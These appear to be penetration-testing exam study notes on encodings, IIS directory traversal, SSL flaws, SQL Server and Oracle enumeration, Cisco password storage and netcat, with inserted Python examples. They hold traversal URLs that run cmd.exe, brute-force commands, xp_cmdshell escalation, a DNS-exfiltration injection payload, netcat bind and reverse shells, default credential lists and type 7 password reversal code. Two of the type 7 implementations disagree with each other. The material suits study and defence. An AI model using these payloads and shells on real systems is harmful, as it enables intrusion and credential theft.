 Each Base64 digit represents exactly 6 bits of data. Three 8-bit bytes (24 bits) are therefore represented by four 6-bit Base64 digits, with = padding when the input length is not a multiple of three.
 Base64 is not encryption; it is an encoding, a way of representing binary data using only printable characters. Recognise it by the character set A-Z a-z 0-9 + / and the trailing = padding.
 Encoding a username and password with Base64 (as HTTP Basic authentication does) makes them unreadable by the naked eye, but they are as easily decoded as they are encoded. Security is not the intent; the encoding only turns characters that are not HTTP-safe into ones that are.
 Example of Base64:
TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz
IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg
dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu
dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLCBleGNlZWRzIHRo
ZSBzaG9ydCB2ZWhlbWVuY2Ugb2YgYW55IGNhcm5hbCBwbGVhc3VyZS4=
 The MD5 algorithm is a widely used hash function producing a 128-bit hash value.
Although MD5 was initially designed to be used as a cryptographic hash function, it has been found to suffer from extensive vulnerabilities (practical collisions). It can still be used as a checksum to verify data integrity, but only against unintentional corruption.
 Like most hash functions, MD5 is neither encryption nor encoding; it is one-way. Password hashes can nevertheless be recovered by brute-force or dictionary attack, because MD5 is fast and unsalted MD5 is trivially rainbow-tabled.
 The 128-bit (16-byte) MD5 hashes (also termed message digests) are typically represented as a sequence of 32 hexadecimal digits. The following demonstrates a 43-byte ASCII input and the corresponding MD5 hash:
 MD5("The quick brown fox jumps over the lazy dog") = 9e107d9d372bb6826bd81d3542a419d6

Percent Encoding
Used in URL encoding. Reserved characters have special meanings in the context of URLs and must be encoded into another form, the percent-encoded form, to avoid ambiguity. A classic example is /, which separates path segments in a URL: if the / character itself has to be transmitted as data, it must be encoded so that the receiver or parser of the URL does not get confused and parse the URL incorrectly. / is therefore encoded as %2F, which the URL parser decodes back into /.
  • 68. . = %2E (encoded although it is an unreserved character)
\ = %5C
/ = %2F
: = %3A
< = %3C
> = %3E
It is also possible to encode unreserved characters by giving the character's ASCII value in hexadecimal, preceded by %. For example, A can be written as %41; 41 is the hexadecimal for 65, which is the ASCII code for capital A. Lowercase a is %61.

Double Percent Encoding
Double percent encoding is percent encoding applied twice: the % of the first pass is itself encoded as %25, so a double-encoded / is %252F.

IIS 5.0 directory traversal code execution - CVE-2001-0333
Normal URL: http://example.com/scripts/../../winnt/system32/cmd.exe?/c+dir+c:
Double-encoded URL: http://example.com/scripts/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:
http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
The server checked the once-decoded path for traversal, then decoded it a second time before using it, so the ../ only appeared after the check had passed.

Unicode Attack
The double-decode value %255c can be substituted for a variety of Unicode representations of the \ or / characters such as %c0%af, %c1%9c, %c1%pc, %c0%qf, %c1%8s, %c1%1c, %c1%af and %e0%80%af (note that %c1%pc, %c0%qf and %c1%8s are not valid hex pairs; they are kept here as the notes list them). %c0%af and %e0%80%af are overlong UTF-8 encodings of /, and %c1%9c of \: a decoder that accepts overlong forms turns them into the path separator after the traversal check has already run. Which representation succeeds depends on the language character set installed and running on the host.
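Double decoding and overlong UTF-8 are easier to see than to describe, so here is an added example written for this page rather than taken from any advisory. It models the check-then-decode-again mistake behind the IIS URLs above (it does not reproduce IIS itself): WEBROOT is an assumed document root, serve_vulnerable normalises and checks the once-decoded path and then decodes it a second time with a decoder that tolerates overlong sequences, while serve_safe decodes exactly once, strictly, and checks the very string it will use. The encoding helpers show where %252F and %c0%af come from.

```python
"""Percent encoding, double decoding and overlong UTF-8 in a path-traversal check.

Added example for this page; the request handler is a constructed model of the
check-then-decode-again mistake and does not reproduce IIS itself.
"""
import posixpath
from urllib.parse import quote, unquote_to_bytes

WEBROOT = "/inetpub/wwwroot/scripts"   # assumed document root for the examples


def percent_encode(s):
    return quote(s, safe="")


def double_encode(s):
    """Encodes twice: the % from the first pass becomes %25 on the second."""
    return quote(quote(s, safe=""), safe="")


def decode_lenient_utf8(data):
    """Decodes UTF-8 but accepts overlong sequences (e.g. C0 AF for '/'), the mistake the
    IIS Unicode bug relied on. Python's own bytes.decode('utf-8') rejects them."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            cp, n = b, 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(data):
            cp, n = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F), 2
        elif 0xE0 <= b < 0xF0 and i + 2 < len(data):
            cp, n = ((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F), 3
        else:
            cp, n = 0xFFFD, 1
        out.append(chr(cp))
        i += n
    return "".join(out)


def resolve(path):
    """Joins the decoded request path onto WEBROOT and collapses .. and \\ like a file system."""
    return posixpath.normpath(WEBROOT + "/" + path.replace("\\", "/").lstrip("/"))


def is_confined(path):
    return resolve(path).startswith(WEBROOT + "/")


def serve_vulnerable(url_path):
    """Checks the once-decoded path, then decodes again (tolerating overlong UTF-8) before use."""
    once = unquote_to_bytes(url_path)                       # %252E -> %2E ; %c0%af -> C0 AF
    if not is_confined(once.decode("utf-8", "replace")):    # lossy view: C0 AF is not a slash here
        return "403"
    final = decode_lenient_utf8(unquote_to_bytes(once))     # second decode: %2E -> . , C0 AF -> /
    return "exec:" + resolve(final)


def serve_safe(url_path):
    """Decodes exactly once, strictly, and checks the same string it will use."""
    try:
        final = unquote_to_bytes(url_path).decode("utf-8")  # strict: overlong forms raise
    except UnicodeDecodeError:
        return "400"
    if not is_confined(final):
        return "403"
    return "ok:" + resolve(final)
```

Fed the double-encoded URL or the ..%c0%af.. form, serve_vulnerable passes its check and then executes a path outside WEBROOT; serve_safe refuses the overlong bytes outright and treats %2E%2E as a literal directory name, so neither form leaves the document root.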
  • 69. http://TARGET/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

Encryption transforms data (plaintext) into another form (ciphertext) in such a way that only specific individuals can reverse the transformation, using a cipher and a key. Encryption is for maintaining confidentiality, so the ability to reverse the transformation (possession of the key) is limited to certain people; unlike encoding, it cannot be reversed without that secret.

Identification of common SSL vulnerabilities
 POODLE (CVE-2014-3566) - The Padding Oracle On Downgraded Legacy Encryption attack was published in October 2014 and takes advantage of two factors: some servers and clients still support SSL 3.0 for interoperability with legacy systems, and SSL 3.0's CBC block padding is neither covered by the MAC nor checked beyond its last byte, which gives a padding oracle.
 The client initiates the handshake and sends the list of SSL/TLS versions it supports. An attacker performing a man-in-the-middle (MiTM) attack interferes with the handshake until the client falls back to the vulnerable SSL 3.0. Disabling SSL 3.0 (and supporting TLS_FALLBACK_SCSV) removes the issue.
 BEAST (CVE-2011-3389) - The Browser Exploit Against SSL/TLS attack was published in September 2011 and affects SSL 3.0 and TLS 1.0. An attacker can decrypt data exchanged between two parties by exploiting the predictable IV in the CBC implementation of TLS 1.0 (the last ciphertext block of one record is the IV of the next), which enables a chosen-plaintext attack. TLS 1.1 and later use an explicit per-record IV and are not affected.

H13 - Source Code Review
First step is to mirror the remote server to your local system (GNU Wget). Sam Spade can be used to identify hidden fields and email addresses.
Common techniques for identifying and reviewing deficiencies in the areas of security:
 Black box testing (no source; mostly dynamic and often automated) versus white box testing (with source; mostly manual review); static analysis of the code versus dynamic testing of the running application.
Define scope: which vulnerabilities you need to look for, such as the OWASP Top 10, SANS Top 25, etc. Try to review as many of them as possible, if not all. Then decide how many of them can be detected with tools and which are best suited to manual review.
Categorise the vulnerabilities by priority. A few categories to look at:
 Authorisation
 Authentication
 Injection flaws
 Improper error handling / exception flaws
 Encryption (cryptography)
 Auditing and logging
 Session-related flaws (session management)
 Insecure configuration
 Distrust of user input
  • 70. Appendix J: Databases
MS-SQL            1433/TCP
MS-SQL-SSRP       1434/UDP (SQL Server Resolution Protocol, the browser service)
MS-SQL-HIDDEN     2433/TCP
ORACLE-TNS        1521/TCP
ORACLE-TNS-ALT    1526/TCP
ORACLE-TNS-ALT    1541/TCP
MYSQL             3306/TCP

J1 - Microsoft SQL Server
Knowledge of common attack vectors for Microsoft SQL Server.
nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info x.x.x.x
nmap -p1433 --script ms-sql-brute --script-args userdb=/root/user.txt,passdb=/root/pass.txt x.x.x.x
SA account and default DBs: SQL Server 2005 and 2008 contain five system databases: master, model, tempdb, msdb and mssqlsystemresource (aka Resource).
Nessus finding: the remote instance of MS SQL / SQL Server has the default 'sa' account enabled without any password. Fix from the C:\MSSQL7 command-line tools:
EXEC sp_password NULL, 'password', 'sa'
go
exit
SQL Server 7.0 (released 1998) and SQL Server 2000 both allowed a blank sa password at install and shipped with xp_cmdshell enabled; from SQL Server 2005 onwards xp_cmdshell is disabled by default and must be enabled with sp_configure. Later versions: 2005, 2008, 2008 R2, 2012, 2014, 2016, 2017 and later.
Understanding of privilege escalation and attack techniques for a system compromised via database connections.
xp_cmdshell (not xp_cmd_shell): runs an OS command as the SQL Server service account. Disabled by default since 2005.
Hidden port: 2433/TCP
EXEC xp_cmdshell 'dir *.exe';   -- EXEC, not RUN
GO
Get version: SELECT @@VERSION
Load file: SELECT * FROM OPENROWSET(BULK 'C:\Temp\DJ1885.txt', FORMATFILE='C:\Temp\DJ1885.fmt') AS Test
 Reading the registry: EXEC master..xp_regread 'hKey','Key Value','String Value',@outvar OUTPUT (T-SQL keywords are case-insensitive, so EXEC and Exec are equivalent)
 Writing the registry: EXEC master..xp_regwrite 'hKey','Key Name','String Value','Data type','Value to write' (Exam: can regwrite be used for privilege escalation? Yes: the write happens as the SQL Server service account, so with sufficient rights it can add Run keys or alter service configuration under HKLM.)
 Deleting a registry string: EXEC master..xp_regdeletevalue 'hKey','Key Name','String Value'

J2 - Oracle RDBMS
Get Oracle version: SELECT * FROM V$VERSION or SELECT version FROM V$INSTANCE
SID: the Oracle SID is the unique name that identifies your instance/database (database name + instance number).
If your database name is somedb and your instance number is 3, then your SID is somedb3.
TNS - Transparent Network Substrate is the network protocol used by Oracle for connectivity to Oracle databases. The Oracle Database Listener is the server process that provides basic network connectivity for clients, application servers and other databases to an Oracle database.
  • 71. When enumerating Oracle, the first step is to talk to the TNS listener, which usually resides on the default port (1521/TCP).
$ ./tnscmd.pl status -h 192.168.0.2
sending (CONNECT_DATA=(COMMAND=status)) to 192.168.0.2:1521
writing 89 bytes
reading
. .......6.........E. ...........O........(DESCRIPTION=(TMP=)(VSNNUM=153093376)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF) (VERSION=TNSLSNR for 32-bit Windows: Version 10.2.0.5.0 - Production)(START_DATE=30-MAY-2007 02:00:25)
In the above example the listener banner reports a 10g listener (10.2.0.5.0). Note that the VSNNUM in the same line, 153093376 = 0x09200500, decodes to 9.2.0.5.0, so this pasted output is internally inconsistent; when the two disagree, decode VSNNUM rather than trusting the banner text.
Once we have access to the listener the next step is to enumerate the SID. There are a number of tools (Kali, Nmap scripts) to brute force the SID; once you have it, the next step is account enumeration. Review the default usernames and passwords.
Derivation of version and patch information from hosts running Oracle software.
nmap x.x.x.x -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt
TNS listener on TCP 1521 (sometimes 1526, 1541).
msf > use auxiliary/admin/oracle/tnscmd
Or use tnscmd.pl (stored under /Files and Software - remember to take it for the CREST lab):
perl tnscmd.pl -h 192.168.0.13            (default command = ping)
perl tnscmd.pl version -h 192.168.0.13    -- VSNNUM=186647040
VSNNUM is the version packed into a 32-bit integer. Convert it to hex (Windows Calculator in Programmer mode) and pad to 8 digits: 186647040 = 0x0B200200, read as 0B.2.0.02.00 = 11.2.0.2.0 (8 bits major, 4 bits minor, 4 bits maintenance, 8 bits patch set, 8 bits port-specific). The 8i-era value 135294976 = 0x08107000 predates this packing and is read by eye from its hex digits as 8.1.7.
[oracle@DCG023 8828328]$ opatch lsinventory       (exact patch level, once you have a shell as the oracle user)
perl tnscmd.pl status -h 192.168.0.13
A better approach is the NSE script: nmap --script=oracle-sid-brute -p 1521 x.x.x.x - which returns the SID, here XE (Express Edition):
| oracle-sid-brute:
|_ XE
...then, having got the SID:
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=XE 192.168.0.13 - this checks common accounts; specify your own list as below.
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=XE,userdb=/root/user.txt,passdb=/root/pass.txt 192.168.0.13
Default Oracle accounts found this way:
perfstat:perfstat => Valid credentials
scott:tiger => Valid credentials
(Source) Oracle Database installs with several default database user accounts. Upon successful installation of the database, the Database Configuration Assistant automatically locks and expires most default database user accounts. However, if you performed a manual installation, then no default database users are locked upon successful installation of the database server. Or, if you have upgraded from a previous release of Oracle Database, you may have default accounts from earlier releases.
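Returning to the VSNNUM value that tnscmd returns (slide 71 above): rather than converting by hand in Calculator, here is an added example written for this page that decodes the packed 32-bit version and pulls both VSNNUM and the banner string out of a listener reply. It is not part of tnscmd.pl or any Nmap script; the reply text is the one quoted on the slide, re-typed as a constructed string, and the 8/4/4/8/8 packing applies to 9i and later (it does not apply to the 8i-era 135294976, which the notes read by eye as 8.1.7).

```python
"""Decode the VSNNUM and VERSION fields returned by the Oracle TNS listener.

Added example for this page; the listener reply is the one quoted on slide 71,
re-typed here as a constructed string. The packing applies to 9i and later.
"""
import re

LISTENER_REPLY = ("(DESCRIPTION=(TMP=)(VSNNUM=153093376)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)"
                  "(VERSION=TNSLSNR for 32-bit Windows: Version 10.2.0.5.0 - Production)"
                  "(START_DATE=30-MAY-2007 02:00:25)")


def vsnnum_to_version(vsnnum):
    """VSNNUM packs the version into 32 bits: 8 bits major, 4 minor, 4 maintenance,
    8 patch set, 8 port-specific (e.g. 0x0A200100 -> 10.2.0.1.0)."""
    major = (vsnnum >> 24) & 0xFF
    minor = (vsnnum >> 20) & 0xF
    maint = (vsnnum >> 16) & 0xF
    patch = (vsnnum >> 8) & 0xFF
    port = vsnnum & 0xFF
    return f"{major}.{minor}.{maint}.{patch}.{port}"


def parse_listener_reply(reply):
    """Pulls VSNNUM (decoded) and the banner VERSION string out of a status/version reply,
    and flags the case where the two disagree."""
    vsn = re.search(r"VSNNUM=(\d+)", reply)
    banner = re.search(r"Version (\d+(?:\.\d+)+)", reply)
    decoded = vsnnum_to_version(int(vsn.group(1))) if vsn else None
    banner_version = banner.group(1) if banner else None
    return {
        "vsnnum": int(vsn.group(1)) if vsn else None,
        "decoded": decoded,
        "banner": banner_version,
        "consistent": decoded is not None and decoded == banner_version,
    }
```

Run over the slide's own reply this reports decoded 9.2.0.5.0 against a banner of 10.2.0.5.0 and consistent False, which is exactly the inconsistency noted above; on a real host the two agree and either is usable for version lookup.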
  • 72. If you install Oracle Enterprise Manager, the SYSMAN and DBSNMP accounts are open, unless you configure Oracle Enterprise Manager for central administration, in which case the SYSMAN account (if present) is locked. If you do not install Oracle Enterprise Manager, then only the SYS and SYSTEM accounts are open; the Database Configuration Assistant locks and expires all other accounts (including SYSMAN and DBSNMP). The sample accounts created with a database are HR, OE and SCOTT.
Default usernames and passwords (username:password):
ANONYMOUS:ANONYMOUS
CTXSYS:CTXSYS
DBSNMP:DBSNMP
LBACSYS:LBACSYS
MDSYS:MDSYS
ORDPLUGINS:ORDPLUGINS
ORDSYS:ORDSYS
OUTLN:OUTLN
WKSYS:WKSYS
WMSYS:WMSYS
OLAPSYS:MANAGER
SCOTT:TIGER
SYSMAN:OEM_TEMP
SYSTEM:MANAGER
SYS:CHANGE_ON_INSTALL
XDB:CHANGE_ON_INSTALL

Oracle Port Filtering - Valid Node Checking (VNC)
The Oracle Database Listener allows filtering of Oracle DB connections through the Valid Node Checking feature. The listener validates the IP address (or host name) of the incoming client against the "allow" or "deny" rules specified in sqlnet.ora before opening a connection to the database. This feature has been available since Oracle8. Specify permitted IPs through tcp.invited_nodes or deny rules through tcp.excluded_nodes. Beginning with Oracle 11g R2, allow and deny rules can include wildcards and CIDR notation.
tcp.validnode_checking = YES
tcp.excluded_nodes = {list of IP addresses}
tcp.invited_nodes = {list of IP addresses}

MySQL
Get version: SELECT version();
Load file: SELECT LOAD_FILE("/etc/passwd");
Out-of-band (DNS) exfiltration on a Windows host, via a UNC path that forces a name lookup for the injected value:
?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), '.yourhost.com\\')))
  • 73. J3 - Web / App / Database Connectivity
Common databases (Oracle, MySQL and Access) and the connection and authentication methods used by web applications.
MSSQL
SQL Server authentication:
 ODBC
 ActiveX Data Objects (ADO) connection string
Windows NT authentication:
 Basic authentication must be enabled for the web application.
Oracle
 Web applications access a data source through a connection; a DataSource object can be thought of as a factory for connections to the particular data source that the DataSource instance represents.
 The OCI8 extension provides three different functions for connecting to Oracle. The standard connection function is oci_connect(); it creates a connection to an Oracle database and returns a resource used by subsequent database calls.
 PHP provides the Oracle OCI8 functions. Other options are PDO with the Oracle driver and (where supported) ODBC.

Misc.
Daytime Protocol
The Daytime Protocol (RFC 867) is served on both TCP and UDP port 13. A host connects to a server that supports it on either transport and the server returns an ASCII string of the current date and time in an unspecified format, e.g.
Monday, February 22, 1982 18:45:59-PST
Time Protocol
The Time Protocol (RFC 868) provides a site-independent, machine-readable date and time. A host connects to a server on port 37 (TCP or UDP). The server sends the time as a 32-bit unsigned integer in binary, network byte order, representing the number of seconds since 00:00 (midnight) on 1 January 1900 GMT, and closes the connection. Over UDP the client simply sends any datagram to the server port, as there is no connection setup. (Subtract 2208988800 to convert the value to a Unix epoch time.)
Many Unix-like operating systems used the Time Protocol to monitor or synchronise their clocks with the rdate utility, but this was superseded by the Network Time Protocol (NTP) and the corresponding ntpdate utility. NTP is more sophisticated in various ways, among them a resolution finer than one second.

Cisco Config Password Storage
Cisco: We recommend that you use the enable secret command (do not use enable password) because it uses an improved encryption algorithm. If you configure the enable secret command, it takes precedence over the enable password command; the two commands cannot be in effect simultaneously.
To determine which scheme has been used to protect a specific password, check the digit preceding the encrypted string in the configuration file. If that digit is a 7, the password has been encrypted with the weak, reversible algorithm. If the digit is a 5, the password has been hashed with salted MD5.
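The "weak algorithm" behind a type 7 digit is a fixed-key XOR that any reader can undo, which is the whole reason the type digit matters. As an added example written for this page (not Cisco's code, and not from any of the online type 7 reversers), the block below reverses the username jdoe password 7 string shown on the next slide, which is Cisco's own documentation example, runs the scheme forwards so the round trip can be checked, and reads the type digit off configuration lines so the clear-text and reversible ones can be picked out of a show running-config dump. The key string is the constant IOS uses; the seed is the two decimal digits at the front of every type 7 value.

```python
"""Cisco type 7 reversal, plus a helper that reads the type digit off a config line.

Added example for this page; the type 7 string is Cisco's documentation example
and the other configuration lines are constructed.
"""
import re

# Fixed key used by IOS for type 7 "encryption"; the two leading decimal digits of a
# type 7 string are the starting offset into this key.
XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def type7_decrypt(encoded):
    seed = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])
    return "".join(chr(b ^ ord(XLAT[(seed + i) % len(XLAT)])) for i, b in enumerate(body))


def type7_encrypt(plain, seed=7):
    """The same XOR run forwards; any seed below len(XLAT) decodes again."""
    out = [f"{seed:02d}"]
    for i, ch in enumerate(plain.encode()):
        out.append(f"{ch ^ ord(XLAT[(seed + i) % len(XLAT)]):02X}")
    return "".join(out)


def password_type(config_line):
    """Returns the type digit printed after 'password'/'secret' (0 when none is shown),
    or None for a line that carries no password at all."""
    m = re.search(r"\b(?:secret|password)\s+(?:(\d{1,2})\s+)?(\S+)", config_line)
    if not m:
        return None
    return int(m.group(1)) if m.group(1) else 0


def weak_lines(config_text):
    """Lines whose password is stored as type 0 (clear) or type 7 (reversible)."""
    return [line for line in config_text.splitlines() if password_type(line) in (0, 7)]


# Constructed running-config excerpt mixing the types discussed on this page.
SAMPLE_CONFIG = """\
hostname R1
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
username ops password 0 cisco123
enable secret 9 $9$WnArItcQHW/uuE$x5WTLbu7PbzGDuv0fSwGKS/KURsy5a3WCQckmJp0MbE
"""
```

type7_decrypt recovers the jdoe password in a single pass with no key material beyond the constant in the file, which is the practical meaning of "encrypted, not hashed"; weak_lines over a real dump is the quick audit for what service password-encryption is actually protecting.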
  • 74. enable password xxxxxxx stores the password in clear text (type 0).
enable password combined with service password-encryption only means someone looking over your shoulder has to memorise a slightly harder string for long enough to Google "crack type 7 password".
#enable
#configure terminal
(config)#enable secret    produces a hash (it does not encrypt)
For example, in the running configuration (note the $1 for MD5 and $iUjJ for the salt):
#show running-config | include enable
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP
The password was hashed with MD5 when it was entered; show running-config only displays the stored value. The enable secret has been hashed with MD5, whereas in the command:
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
the password has been obscured with the weak, reversible type 7 scheme (it is not a hash).

Type 0 - The password is stored as-is in the running/startup config:
enable password cisco123
Type 4 - The password is hashed with unsalted, un-iterated SHA-256. Deprecated from IOS 15.3(3) because it turned out weaker than type 5:
enable secret 4 Rv4kArhts7yA2xd8BD2YTVbts
Type 5 - The password is hashed with salted MD5 (md5crypt, the $1$salt$hash form shown above):
enable secret 5 00271A5307542A02D22842
Type 7 - The password is "encrypted" with a fixed-key XOR (Vigenère-style) cipher that any type 7 reverser on the web undoes in under a second <- AVOID
enable password cisco123
service password-encryption
In newer versions of Cisco IOS there are type 8 and type 9 passwords, which are much more secure.
Type 8 - The password is hashed with PBKDF2-SHA-256 (Password-Based Key Derivation Function 2 with the 256-bit Secure Hash Algorithm), available from IOS 15.3(3):
R1(config)#enable algorithm-type sha256 secret cisco
R1(config)#do sh run | i enable
enable secret 8 $8$mTj4RZG8N9ZDOk$elY/asfm8kD3iDmkBe3hD2r4xcA/0oWS5V3os.O91u.
Type 9 - The password is hashed with scrypt, available from IOS 15.3(3):
R1(config)#enable algorithm-type scrypt secret cisco
R1(config)#do show running-config | include enable
enable secret 9 $9$WnArItcQHW/uuE$x5WTLbu7PbzGDuv0fSwGKS/KURsy5a3WCQckmJp0MbE

Netcat Configuration
Transferring a File (the receiver's output is the sender's input):
nc -l -p 4444 > output.txt          # receiving end
nc <IP Address> 4444 < input.txt    # sending end
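Before moving on with netcat, here is an added example for the Cisco password-type notes above (it is not Cisco code and not code from the original notes): a small Python audit that parses enable/username lines from a running-config dump, labels each stored password by its type digit, checks that the digit agrees with the hash prefix ($1$, $8$, $9$), and reverses type 7 strings using the fixed XLAT key that IOS XORs against. The sample configuration is constructed: the $1$, $8$ and $9$ values are the ones quoted in the notes, while the usernames admin and ops are invented.

```python
"""Audit Cisco IOS password lines by type and reverse type 7 strings.

Added example for the Cisco password-storage notes; not Cisco code.
SAMPLE_CONFIG is constructed: the $1$, $8$ and $9$ values are the ones
quoted in the notes, the usernames 'admin' and 'ops' are invented.
"""
import re
from typing import Dict, List, Optional

# The fixed key IOS XORs a type 7 password against. The first two digits of a
# type 7 string are the starting offset into this key (IOS emits 00..15).
XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# type digit -> (what it is, what someone holding the config can do with it)
TYPE_INFO = {
    "0": ("plaintext", "recoverable"),
    "4": ("unsalted single-round SHA-256 (deprecated)", "crackable offline"),
    "5": ("MD5-crypt $1$salt$hash", "crackable offline"),
    "7": ("XOR against fixed key, reversible", "recoverable"),
    "8": ("PBKDF2-HMAC-SHA-256 $8$salt$hash", "ok"),
    "9": ("scrypt $9$salt$hash", "ok"),
}
EXPECTED_PREFIX = {"5": "$1$", "8": "$8$", "9": "$9$"}

# "enable secret 5 ...", "enable password cisco123", "username jdoe password 7 ..."
# The type digit is optional; a missing digit means type 0 (plaintext).
LINE_RE = re.compile(
    r"^\s*(?:enable|username\s+(?P<user>\S+))\s+(?P<kw>password|secret)\s+"
    r"(?:(?P<type>[045789])\s+)?(?P<value>\S+)\s*$"
)


def type7_decode(enc: str) -> str:
    """Reverse a type 7 string: 2-digit seed, then one hex byte per character."""
    if len(enc) < 4 or len(enc) % 2 or not re.fullmatch(r"\d{2}[0-9A-Fa-f]+", enc):
        raise ValueError("not a type 7 string")
    seed = int(enc[:2])
    if seed > 15:
        raise ValueError("type 7 seed out of range")
    chars = []
    for i in range(2, len(enc), 2):
        chars.append(chr(int(enc[i:i + 2], 16) ^ ord(XLAT[seed % len(XLAT)])))
        seed += 1
    return "".join(chars)


def type7_encode(plain: str, seed: int = 0) -> str:
    """Forward direction, to show what service password-encryption actually stores."""
    if not 0 <= seed <= 15:
        raise ValueError("seed must be 0..15")
    out = [f"{seed:02d}"]
    for ch in plain:
        out.append(f"{ord(ch) ^ ord(XLAT[seed % len(XLAT)]):02X}")
        seed += 1
    return "".join(out)


def audit(config_text: str) -> List[Dict[str, Optional[str]]]:
    """One finding per enable/username password line in a running-config dump."""
    findings: List[Dict[str, Optional[str]]] = []
    for line in config_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        t = m.group("type") or "0"
        value = m.group("value")
        description, strength = TYPE_INFO[t]
        plaintext = None
        if t == "0":
            plaintext = value
        elif t == "7":
            try:
                plaintext = type7_decode(value)
            except ValueError:
                strength = "malformed type 7"
        prefix = EXPECTED_PREFIX.get(t)
        if prefix and not value.startswith(prefix):
            # e.g. "enable secret 5 00271A53...": the digit says MD5-crypt but the
            # value is not $1$salt$hash, so the line was hand-edited or mislabelled.
            strength = f"type {t} but value lacks {prefix} prefix"
        findings.append({
            "user": m.group("user") or "enable",
            "keyword": m.group("kw"),
            "type": t,
            "description": description,
            "strength": strength,
            "plaintext": plaintext,
        })
    return findings


SAMPLE_CONFIG = """\
enable password cisco123
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
username admin secret 9 $9$WnArItcQHW/uuE$x5WTLbu7PbzGDuv0fSwGKS/KURsy5a3WCQckmJp0MbE
username ops secret 8 $8$mTj4RZG8N9ZDOk$elY/asfm8kD3iDmkBe3hD2r4xcA/0oWS5V3os.O91u.
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_CONFIG):
        shown = f["plaintext"] if f["plaintext"] is not None else "-"
        print(f'{f["user"]:<8} type {f["type"]}  {f["strength"]:<18} {shown}')
```

Running it turns the jdoe type 7 string from the notes back into the sentence Cisco's own documentation uses as its example, which is the practical point: service password-encryption protects against nothing more than a glance. Anything the audit labels "recoverable" or "crackable offline" should be migrated with enable algorithm-type scrypt secret (and the matching username ... algorithm-type scrypt secret form).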
nc -l -p 1234 > out.file               # receiving end
nc -w 3 [destination] 1234 < out.file  # sending end (-w 3: give up after 3 seconds idle)

Set up a Netcat Bind Shell (Windows)
nc -l -p 4444 -e cmd.exe               # on the target: listen and hand the connection to cmd.exe
nc <target IP> 4444                    # from the attacker: connect to the shell

Set up a Netcat Bind Shell (Linux)
nc -l -p 4444 -e /bin/sh               # on the target
nc <target IP> 4444                    # from the attacker: connect to the shell

Set up a Netcat Reverse Shell (Windows)
The compromised host connects out to the attacker, where the listener (-l) is already waiting. The -e runs on the compromised host, not on the attacker's machine, hence "reverse" shell. Port 443 is chosen because outbound 443 is rarely blocked by egress filtering.
nc -l -p 443                           # attacker: listen for the connection
nc <attacker IP> 443 -e cmd.exe        # target: connect back and attach cmd.exe

Common options:
-v  verbose
-l  listen for an inbound connection
-L  (Windows build only) listen again after the client disconnects
-p  local port
-n  numeric only; suppress name/port resolution
-e  execute the named program once a connection is made
-u  UDP mode
-w  timeout for connects and final net reads; it has no effect on the -l option (default: no timeout)
-s  local source address

nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx
 The -s option binds "in front of" some services that may already be listening on those ports (but will shut that port down).
 Caveat: -e is compiled out of many current netcat builds (Debian's netcat-openbsd, for example); ncat provides the same behaviour with --exec / --sh-exec.

Use of |
A pipe takes the output of one command and makes it usable as the input of a following command: output from the left-hand command is passed directly to the input of the command on the right-hand side of the pipe. Example:
cat ./somefile | grep cool
takes the contents of somefile and makes them available to grep, which then prints all lines containing the word cool.
Hence, on the receiving side netcat sits on the left-hand side of the pipe and whatever follows processes what it receives:
nc -l -p 1234 | uncompress -c | tar xvfp -
On the sending side netcat sits on the right-hand side, with the left-hand side producing the data:
tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234

The type command displays the command name's path, or other information such as an alias or whether it is a shell builtin:
$ type cp
cp is /bin/cp
$ type unknown
unknown not found
$ type type
type is a shell builtin

Password Combinations
An 8-character password drawn from the 26 lower-case letters and 10 digits gives 36^8 = 2,821,109,907,456 (about 2.8 × 10^12) possibilities (verified on a calculator). In general the keyspace is (alphabet size)^(length); adding a character class widens the base, but adding length raises the exponent and grows the space far faster.

Web Testing App Proxy Configurations
 Client-side certificates: when the application authenticates the client with a certificate, the certificate (usually a PKCS#12 file) must be installed in the intercepting proxy, so that the proxy rather than the browser presents it to the server. In Burp this is under User Options / SSL / Client SSL Certificates. (Related Burp notes: Client Certificate in Burp's User Options/SSL; Options/SSL menu fails to load upon restore if a client certificate is configured; Options / SSL / Client SSL Certificates; Usage of Certificates.)
